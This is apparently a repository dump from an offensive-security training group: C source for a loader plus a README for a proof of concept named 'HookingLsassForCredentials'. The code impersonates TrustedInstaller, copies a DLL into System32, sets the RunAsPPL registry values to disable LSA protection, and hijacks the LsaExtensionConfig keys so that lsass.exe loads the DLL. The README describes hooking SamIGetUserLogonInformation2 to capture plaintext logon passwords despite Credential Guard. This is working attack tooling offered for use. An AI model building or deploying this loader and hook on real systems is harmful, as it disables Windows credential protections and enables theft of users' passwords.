        wprintf(L"[*] TrustedInstaller State [ %u ], Starting Service...\n", ssp.dwCurrentState);

        // A concurrent start by someone else is not an error.
        if (!StartServiceW(hSvc, 0x00, NULL))
        {
            if (GetLastError() != ERROR_SERVICE_ALREADY_RUNNING) {
                wprintf(L"[!] StartService Failed With Error: %lu\n", GetLastError());
                goto _END_OF_FUNC;
            }
        }

        // Poll until the service reports SERVICE_RUNNING (no upper bound).
        do {

            Sleep(200);

            if (!QueryServiceStatusEx(hSvc, SC_STATUS_PROCESS_INFO, (LPBYTE)&ssp, sizeof(ssp), &dwBytesNeeded)) {
                wprintf(L"[!] QueryServiceStatusEx [%d] Failed With Error: %lu\n", __LINE__, GetLastError());
                goto _END_OF_FUNC;
            }

        } while (ssp.dwCurrentState != SERVICE_RUNNING);
    }

    if (ssp.dwProcessId == 0x00)
    {
        wprintf(L"[!] Could Not Resolve TrustedInstaller's PID\n");
        goto _END_OF_FUNC;
    }

    wprintf(L"[+] TrustedInstaller PID: %lu\n", ssp.dwProcessId);

    if ((hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0x00)) == INVALID_HANDLE_VALUE) {
        wprintf(L"[!] CreateToolhelp32Snapshot Failed With Error: %lu\n", GetLastError());
        goto _END_OF_FUNC;
    }

    // The first thread owned by the service PID is used.
    for (BOOL bOk = Thread32First(hSnap, &ThreadEntry32); bOk; bOk = Thread32Next(hSnap, &ThreadEntry32)) {

        if (ThreadEntry32.th32OwnerProcessID == ssp.dwProcessId)
        {
            dwTrustedInstTid = ThreadEntry32.th32ThreadID;
            break;
        }
    }

    if (!dwTrustedInstTid) {
        wprintf(L"[!] Could Not Resolve TrustedInstaller's TID\n");
        goto _END_OF_FUNC;
    }

    printf("[+] Found TrustedInstaller Thread: %lu\n", dwTrustedInstTid);

    if (!(hTrustedInstThread = OpenThread(THREAD_DIRECT_IMPERSONATION | THREAD_QUERY_INFORMATION, FALSE, dwTrustedInstTid))) {
        wprintf(L"[!] OpenThread Failed For TID %lu With Error: %lu\n", dwTrustedInstTid, GetLastError());
        goto _END_OF_FUNC;
    }

    printf("[+] Opened TrustedInstaller Thread Handle\n");

    {
        NTSTATUS STATUS = 0x00;
        HMODULE hNtdll = NULL;
        fnNtImpersonateThread pNtImpersonateThread = NULL;
        SECURITY_QUALITY_OF_SERVICE ServiceQuality =
        {
            .Length = sizeof(SECURITY_QUALITY_OF_SERVICE),
            .ImpersonationLevel = SecurityImpersonation,
            .ContextTrackingMode = SECURITY_STATIC_TRACKING,
            .EffectiveOnly = FALSE
        };

        // ntdll is always mapped, so GetModuleHandle suffices (no LoadLibrary).
        if (!(hNtdll = GetModuleHandle(TEXT("NTDLL")))) {
            wprintf(L"[!] GetModuleHandleW Failed With Error: %lu\n", GetLastError());
            goto _END_OF_FUNC;
        }

        if (!(pNtImpersonateThread = (fnNtImpersonateThread)GetProcAddress(hNtdll, "NtImpersonateThread"))) {
            wprintf(L"[!] GetProcAddress Failed With Error: %lu\n", GetLastError());
            goto _END_OF_FUNC;
        }

        // (HANDLE)-2 is the current-thread pseudo-handle: the calling thread
        // becomes the server (impersonating) thread.
        if ((STATUS = pNtImpersonateThread((HANDLE)-2, hTrustedInstThread, &ServiceQuality)) != 0x00) {
            wprintf(L"[!] NtImpersonateThread Failed With Status: 0x%08X\n", STATUS);
            goto _END_OF_FUNC;
        }
    }

    bResult = TRUE;

_END_OF_FUNC:
    if (hTrustedInstThread)
        CloseHandle(hTrustedInstThread);
    if (hSnap != INVALID_HANDLE_VALUE)
        CloseHandle(hSnap);
    if (hSvc)
        CloseServiceHandle(hSvc);
    if (hScm)
        CloseServiceHandle(hScm);
    return bResult;
}


// ===============================================================================================================================================================================


/*
 * Write a REG_SZ value under an HKEY_LOCAL_MACHINE subkey.
 *
 * szRegPath:    subkey path relative to HKLM, opened with KEY_SET_VALUE.
 * szValueName:  value to set.
 * szNewDllName: string written; the byte count includes the terminating NUL.
 * Returns TRUE on success. The RegFlushKey result is ignored.
 *
 * Despite the name, nothing here restricts the path to LSA keys: key and value
 * come from the caller (wmain, outside this excerpt). Object-access auditing
 * configured on the target key would record this value set.
 */
BOOL EditLsaRegKey(IN LPCWSTR szRegPath, IN LPCWSTR szValueName, IN LPCWSTR szNewDllName) {

    HKEY hKey = NULL;
    LSTATUS Results = 0x00;
    BOOL bResult = FALSE;

    if ((Results = RegOpenKeyExW(HKEY_LOCAL_MACHINE, szRegPath, 0x00, KEY_SET_VALUE, &hKey)) != ERROR_SUCCESS) {
        wprintf(L"[!] RegOpenKeyEx Failed For '%s' With Error: %lu\n", szRegPath, Results);
        goto _END_OF_FUNC;
    }

    printf("[+] Successfully opened '%S'\n", szRegPath);

    if ((Results = RegSetValueExW(hKey, szValueName, 0x00, REG_SZ, (const BYTE*)szNewDllName, (DWORD)((wcslen(szNewDllName) + 1) * sizeof(WCHAR)))) != ERROR_SUCCESS) {
        wprintf(L"[!] RegSetValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
        goto _END_OF_FUNC;
    }

    wprintf(L"[*] Successfully Set '%s' To '%s'\n", szValueName, szNewDllName);

    RegFlushKey(hKey);

    bResult = TRUE;

_END_OF_FUNC:
    if (hKey)
        RegCloseKey(hKey);
    return bResult;
}

// ===============================================================================================================================================================================

/*
 * Read a registry value under an HKEY_LOCAL_MACHINE subkey into a new buffer.
 *
 * szRegPath, szValueName: subkey (opened with KEY_QUERY_VALUE) and value to read.
 * szDllName: receives a buffer allocated with LocalAlloc(LPTR); the caller
 *            owns it and releases it with LocalFree.
 * Returns TRUE on success. Uses the two-call pattern: the first
 * RegQueryValueExW sizes the data, the second copies it.
 *
 * NOTE(review): the value type is not checked (lpType is NULL), and the buffer
 * is exactly dwDllNameLen bytes, so a value stored without a terminating NUL
 * is returned unterminated. If the second RegQueryValueExW fails, the buffer
 * already stored in *szDllName is neither freed nor reset to NULL.
 */
BOOL QueryLsaRegKey(IN LPCWSTR szRegPath, IN LPCWSTR szValueName, OUT LPWSTR* szDllName) {

    HKEY hKey = NULL;
    LSTATUS Results = 0x00;
    DWORD dwDllNameLen = 0x00;
    BOOL bResult = FALSE;

    if ((Results = RegOpenKeyExW(HKEY_LOCAL_MACHINE, szRegPath, 0x00, KEY_QUERY_VALUE, &hKey)) != ERROR_SUCCESS) {
        wprintf(L"[!] RegOpenKeyEx Failed For '%s' With Error: %lu\n", szRegPath, Results);
        goto _END_OF_FUNC;
    }

    printf("[+] Successfully opened '%S'\n", szRegPath);

    // Size query only: no data buffer supplied.
    if ((Results = RegQueryValueExW(hKey, szValueName, NULL, NULL, NULL, &dwDllNameLen)) != ERROR_SUCCESS) {
        wprintf(L"[!] RegQueryValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
        goto _END_OF_FUNC;
    }

    // LPTR = LMEM_FIXED | LMEM_ZEROINIT.
    if (!(*szDllName = (LPWSTR)LocalAlloc(LPTR, dwDllNameLen))) {
        wprintf(L"[!] LocalAlloc Failed With Error: %lu\n", GetLastError());
        goto _END_OF_FUNC;
    }

    if ((Results = RegQueryValueExW(hKey, szValueName, NULL, NULL, (LPBYTE)*szDllName, &dwDllNameLen)) != ERROR_SUCCESS) {
        wprintf(L"[!] RegQueryValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
        goto _END_OF_FUNC;
    }

    bResult = TRUE;

_END_OF_FUNC:
    if (hKey)
        RegCloseKey(hKey);
    return bResult;
}

// ===============================================================================================================================================================================


/*
 * Write a REG_DWORD value under an HKEY_LOCAL_MACHINE subkey.
 *
 * szRegPath, szValueName: subkey (opened with KEY_SET_VALUE) and value name.
 * dwNewValue: the DWORD written.
 * Returns TRUE on success. The RegFlushKey result is ignored.
 *
 * The name suggests a protected-process setting, but the key and value are
 * whatever the caller passes (wmain is outside this excerpt).
 * NOTE(review): "%d" is used for a DWORD in the success message.
 */
BOOL EditProtectedProcessLight(IN LPCWSTR szRegPath, IN LPCWSTR szValueName, IN DWORD dwNewValue) {

    HKEY hKey = NULL;
    LSTATUS Results = 0x00;
    BOOL bResult = FALSE;


    if ((Results = RegOpenKeyExW(HKEY_LOCAL_MACHINE, szRegPath, 0x00, KEY_SET_VALUE, &hKey)) != ERROR_SUCCESS) {
        wprintf(L"[!] RegOpenKeyEx Failed For '%s' With Error: %lu\n", szRegPath, Results);
        goto _END_OF_FUNC;
    }

    printf("[+] Successfully opened '%S'\n", szRegPath);

    if ((Results = RegSetValueExW(hKey, szValueName, 0x00, REG_DWORD, (const BYTE*)&dwNewValue, (DWORD)(sizeof(DWORD)))) != ERROR_SUCCESS) {
        wprintf(L"[!] RegSetValueExW Failed For '%s' With Error: %lu\n", szValueName, Results);
        goto _END_OF_FUNC;
    }

    wprintf(L"[*] Successfully Set '%s' To [%d]\n", szValueName, dwNewValue);

    RegFlushKey(hKey);

    bResult = TRUE;

_END_OF_FUNC:
    if (hKey)
        RegCloseKey(hKey);
    return bResult;
}


// ===============================================================================================================================================================================

/*
 * Return the file-name component of a path: the text after the last '/' or
 * '\\', or the whole string when neither separator is present.
 *
 * NOTE(review): when exactly one of p1/p2 is NULL, "p1 > p2" compares a null
 * pointer against a valid one; that works on a flat address space but the C
 * standard does not define the ordering.
 */
static inline LPCWSTR GetFileNameW(IN LPCWSTR szPath)
{
    LPCWSTR p1 = wcsrchr(szPath, L'/');
    LPCWSTR p2 = wcsrchr(szPath, L'\\');
    LPCWSTR pT = (p1 > p2 ? p1 : p2);   // the later of the two separators
    return pT ? pT + 1 : szPath;
}

// ===============================================================================================================================================================================

/*
 * Print the command-line help to stderr. argv0 is reduced to its base name
 * for every "%s" in the text.
 *
 * NOTE(review): the argument placeholders in this text look as if their
 * angle-bracketed tokens were lost in this listing (e.g. "--input [--name ]");
 * confirm against the original source before relying on the wording.
 */
VOID PrintUsage(IN LPCWSTR argv0)
{
    fwprintf(stderr,
        L"[#] Usage:\n"
        L" %s --input [--name ]\n"
        L" Copies the specified DLL into System32 and sets registry keys\n"
        L" --input : Path to the source DLL (required).\n"
        L" --name : Optional name for the DLL in System32\n"
        L" (defaults to base name of ).\n\n"
        L" %s --restore\n"
        L" Removes the deployed DLL from System32 and cleans up registry keys\n\n"
        L" %s /? or %s -?\n"
        L" Displays this help message.\n\n"
        L"Examples:\n"
        L" %s --input Dummy.dll\n"
        L" %s --input Dummy.dll --name MyDummy.dll\n"
        L" %s --restore\n\n",
        GetFileNameW(argv0), GetFileNameW(argv0),
        GetFileNameW(argv0), GetFileNameW(argv0),
        GetFileNameW(argv0), GetFileNameW(argv0), GetFileNameW(argv0));
}

// ===============================================================================================================================================================================

/*
 * Copy szDllPath to C:\Windows\System32\ under the name szDllName.
 *
 * Returns FALSE for NULL arguments, for inputs longer than MAX_PATH, when
 * StringCchPrintfW fails (including truncation of the combined path), or when
 * CopyFileW fails. The destination directory is hard-coded rather than taken
 * from GetSystemDirectoryW.
 *
 * NOTE(review): after CopyFileW fails, GetLastError() is read again following
 * the wprintf call, which may have changed it; save the code once before
 * printing.
 */
BOOL CopyDllToSystem32(IN LPCWSTR szDllPath, IN LPCWSTR szDllName) {


    HRESULT hResult = S_OK;
    WCHAR szDestPath[MAX_PATH] = { 0 };

    if (!szDllPath || !szDllName)
        return FALSE;

    if (wcslen(szDllPath) > MAX_PATH || wcslen(szDllName) > MAX_PATH)
        return FALSE;

    if (FAILED((hResult = StringCchPrintfW(szDestPath, MAX_PATH, L"%s\\%s", L"C:\\Windows\\System32", szDllName)))) {
        wprintf(L"[!] StringCchPrintfW Failed With Error: 0x%08X\n", hResult);
        return FALSE;
    }

    // Third argument is bFailIfExists: FALSE means an existing file at
    // szDestPath is overwritten.
    if (!CopyFileW(szDllPath, szDestPath, FALSE)) {
        wprintf(L"[!] CopyFileW Failed With Error: %lu\n", GetLastError());
        PrintErrorMessageW(GetLastError());
        return FALSE;
    }

    wprintf(L"[*] Copied '%s' To '%s'\n", szDllPath, szDestPath);
    return TRUE;
}


/*
 * Delete C:\Windows\System32\ + szDllName.
 *
 * Returns FALSE for a NULL or over-long name, when StringCchPrintfW fails, or
 * when DeleteFileW fails. Same hard-coded directory and same post-wprintf
 * GetLastError() caveat as CopyDllToSystem32.
 */
BOOL DeleteDllFromSystem32(IN LPCWSTR szDllName) {

    HRESULT hResult = S_OK;
    WCHAR szDestPath[MAX_PATH] = { 0 };

    if (!szDllName)
        return FALSE;

    if (wcslen(szDllName) > MAX_PATH)
        return FALSE;

    if (FAILED((hResult = StringCchPrintfW(szDestPath, MAX_PATH, L"%s\\%s", L"C:\\Windows\\System32", szDllName)))) {
        wprintf(L"[!] StringCchPrintfW Failed With Error: 0x%08X\n", hResult);
        return FALSE;
    }

    if (!DeleteFileW(szDestPath)) {
        wprintf(L"[!] DeleteFileW Failed With Error: %lu\n", GetLastError());
        PrintErrorMessageW(GetLastError());
        return FALSE;
    }

    wprintf(L"[*] Deleted '%s'\n", szDestPath);
    return TRUE;
}


// ===============================================================================================================================================================================



/*
 * Entry point. Prints usage when called with no arguments or with "/?" / "-?",
 * enables SeDebugPrivilege and SeImpersonatePrivilege, impersonates
 * TrustedInstaller, and then continues beyond this excerpt. Returns 0 after
 * printing usage and -1 on any of the failures visible here.
 */
int wmain(int argc, wchar_t* argv[]) {

    DWORD dwPPLRegValueToSet = 0x00;
    WCHAR* szDllNameToSet = NULL;
    WCHAR* szDummyDllPath = NULL;
    WCHAR* szQueriedDllName = NULL;
    BOOL bRestoreMode = FALSE;

    if (argc == 1)
    {
        PrintUsage(argv[0]);
        return 0;
    }

    if (argc == 2 && (wcscmp(argv[1], L"/?") == 0 || wcscmp(argv[1], L"-?") == 0))
    {
        PrintUsage(argv[0]);
        return 0;
    }


    // Both privileges must already be present on the token; EnablePrivilege
    // only toggles them on.
    if (!EnablePrivilege(SE_DEBUG_NAME)) return -1;
    if (!EnablePrivilege(SE_IMPERSONATE_NAME)) return -1;

    printf("[*] Enabled SeDebugPrivilege and SeImpersonatePrivilege\n");

    if (!ImpersonateTrustedInstaller()) return -1;

    printf("[*] Impersonated TrustedInstaller\n");
    /* wmain continues beyond this excerpt. */
463 | 464 | // Restore mode 465 | if (argc == 2 && wcscmp(argv[1], L"--restore") == 0) 466 | { 467 | dwPPLRegValueToSet = 0x02; 468 | szDllNameToSet = OG_DLL_NAME_TO_SET_1001; 469 | bRestoreMode = TRUE; 470 | 471 | if (!QueryLsaRegKey( 472 | L"SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\Interfaces\\1002", 473 | L"Extension", 474 | &szQueriedDllName)) 475 | { 476 | return -1; 477 | } 478 | 479 | // Only delete if it isn't the original DLL 480 | if (wcscmp(szQueriedDllName, OG_DLL_NAME_TO_SET_1001) != 0x00) 481 | { 482 | DeleteDllFromSystem32(szQueriedDllName); 483 | } 484 | else 485 | { 486 | wprintf(L"[!] Cant Delete The Original DLL: %s\n", OG_DLL_NAME_TO_SET_1001); 487 | LocalFree(szQueriedDllName); 488 | } 489 | } 490 | else 491 | { 492 | if (!bRestoreMode) 493 | { 494 | for (int i = 1; i < argc; i++) 495 | { 496 | if (wcscmp(argv[i], L"--input") == 0 && i + 1 < argc) 497 | { 498 | szDummyDllPath = argv[++i]; 499 | } 500 | else if (wcscmp(argv[i], L"--name") == 0 && i + 1 < argc) 501 | { 502 | szDllNameToSet = argv[++i]; 503 | } 504 | else 505 | { 506 | fwprintf(stderr, L"[!] Unknown Parameter: %s\n", argv[i]); 507 | PrintUsage(argv[0]); 508 | return -1; 509 | } 510 | } 511 | 512 | if (!szDummyDllPath) 513 | { 514 | fwprintf(stderr, L"[!] --input Is Required\n"); 515 | PrintUsage(argv[0]); 516 | return -1; 517 | } 518 | 519 | dwPPLRegValueToSet = 0x00; 520 | 521 | if (!szDllNameToSet) 522 | szDllNameToSet = GetFileNameW(szDummyDllPath); 523 | else 524 | { 525 | if (wcslen(szDllNameToSet) < 4 || _wcsicmp(szDllNameToSet + wcslen(szDllNameToSet) - 4, L".dll") != 0) 526 | { 527 | fwprintf(stderr, L"[!] Input DLL Name Must End With .dll\n"); 528 | return -1; 529 | } 530 | } 531 | 532 | if (!CopyDllToSystem32(szDummyDllPath, szDllNameToSet)) 533 | { 534 | return -1; 535 | } 536 | } 537 | } 538 | 539 | printf("[i] %s PPL Settings...\n", bRestoreMode ? 
"Enabling" : "Disabling"); 540 | 541 | if (!EditProtectedProcessLight( 542 | L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 543 | L"IsPplAutoEnabled", 544 | dwPPLRegValueToSet)) { 545 | return -1; 546 | } 547 | 548 | if (!EditProtectedProcessLight( 549 | L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 550 | L"RunAsPPL", 551 | dwPPLRegValueToSet)) { 552 | return -1; 553 | } 554 | 555 | if (!EditProtectedProcessLight( 556 | L"SYSTEM\\CurrentControlSet\\Control\\Lsa", 557 | L"RunAsPPLBoot", 558 | dwPPLRegValueToSet)) { 559 | return -1; 560 | } 561 | 562 | printf("[i] %s LSA Extension DLL Name ... \n", bRestoreMode ? "Restoring" : "Hijacking"); 563 | 564 | if (!EditLsaRegKey( 565 | L"SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\Interfaces\\1001", 566 | L"Extension", 567 | szDllNameToSet)) 568 | { 569 | return -1; 570 | } 571 | 572 | if (!EditLsaRegKey( 573 | L"SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv", 574 | L"Extensions", 575 | szDllNameToSet)) 576 | { 577 | return -1; 578 | } 579 | 580 | 581 | RevertToSelf(); 582 | 583 | return 0; 584 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 NULL 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## HookingLsassForCredentials 2 | 3 |
4 | 5 | ### Quick Links 6 | 7 | [Maldev Academy Home](https://maldevacademy.com) 8 | 9 | [Maldev Academy Syllabus](https://maldevacademy.com/syllabus) 10 | 11 | [Offensive Phishing Operations](https://maldevacademy.com/phishing-course) 12 | 13 |
14 | 15 | ## Explanation 16 | 17 | The goal of this PoC is to leverage the registry key discovered [here](https://github.com/Maldev-Academy/LsassHijackingViaReg) to load a DLL into Lsass.exe that allows us to fetch the user's credentials (in any form possible) while effectively bypassing Credential Guard. It is worth mentioning that when Credential Guard is enabled, Lsass.exe hands credential protection and caching over to LsaIso.exe; however, Lsass.exe remains responsible for verifying the user's logon credentials. 18 | 19 | 
20 | 21 | ## How It Works 22 | 23 | * The initial objective was to retrieve a populated [USER_INTERNAL6_INFORMATION](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1430) structure to access the [USER_ALL_INFORMATION](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1340) structure, allowing us to read critical elements like [NtPassword](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1359C20-L1359C30) and [LmPassword](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1358) during the initial user authentication process. However, the contents of this structure depend on the [WhichFields](https://github.com/winsiderss/phnt/blob/master/ntsam.h#L1199) parameter of the targeted API. 24 | 25 | * To capture a `USER_INTERNAL6_INFORMATION` structure, we hooked [samsrv!SamIGetUserLogonInformation2](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L855). However, this function and its caller (named [lsasrv!LsapSamExtGetUserLogonInformation2](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L816)) override their `WhichFields` parameter, forcibly setting it to `0x1B`. This value is explained [here](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L1040). Therefore, we tried manually altering this value to equal [USER_ALL_READ_TRUSTED_MASK2](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L1049), hoping to read the aforementioned elements. Upon doing this, `SamIGetUserLogonInformation2` returned `STATUS_INVALID_INFO_CLASS`, as explained [here](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/DllMain.c#L1293). 26 | 27 | * As an alternative, we placed a hook at the start of the `SamIGetUserLogonInformation2` function. In the detour function, we read `UNICODE_STRING` structures relative to the `R8` register. 
These structures held valuable information such as the plaintext password entered by the user at the lock screen, the username, and the workstation. However, this approach proved unstable (the data could not be retrieved on every attempt), so the PoC is currently a *work-in-progress* (WIP). 28 | 29 | * It is worth mentioning that the current PoC waits for the LogonUI.exe process to start before installing the hook(s). LogonUI.exe is the process responsible for displaying the Windows login screen and securely capturing user credentials. 30 | 31 | 
32 | 33 | 34 | ## Demo 35 | 36 | 37 | 1. Installing the [Dummy DLL](https://github.com/NUL0x4C/HookingLsassForCredentials/tree/main/DumpHashes) and editing the `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LsaExtensionConfig\Interfaces\1001` registry key's value to load our DLL that will execute our code and act as a proxy to the `lsasrv.dll` DLL. 38 | 39 |
40 | 41 | ![PIC1](https://github.com/user-attachments/assets/691b6e80-33f1-4bdd-b195-3cd4bc03eaa1) 42 | 43 |
44 |
45 | 46 | 2. Upon reboot, the plaintext logon password was captured with Credential Guard enabled. The image below is the truncated output of the `cat C:\DummyDebug.log` command; `C:\DummyDebug.log` is the [DEBUG_FILE](https://github.com/NUL0x4C/HookingLsassForCredentials/blob/main/DumpHashes/Log.h#L4C33-L4C43). 47 | 48 | 
49 | 50 | 51 | ![PIC2](https://github.com/user-attachments/assets/58944393-5b83-4d45-a3ec-2b969160b28e) 52 | 53 | 54 |
55 | 56 | 57 | ### Reference: 58 | * [LsassHijackingViaReg](https://github.com/Maldev-Academy/LsassHijackingViaReg) 59 | 60 | * [phnt/ntsam.h](https://github.com/winsiderss/phnt/blob/master/ntsam.h) 61 | 62 | * [Utilizing Hardware Breakpoints For Hooking (2)](https://maldevacademy.com/new/modules/10) 63 | 64 | * [rad98-hooking-engine](https://github.com/vxunderground/VX-API#rad98-hooking-engine) 65 | --------------------------------------------------------------------------------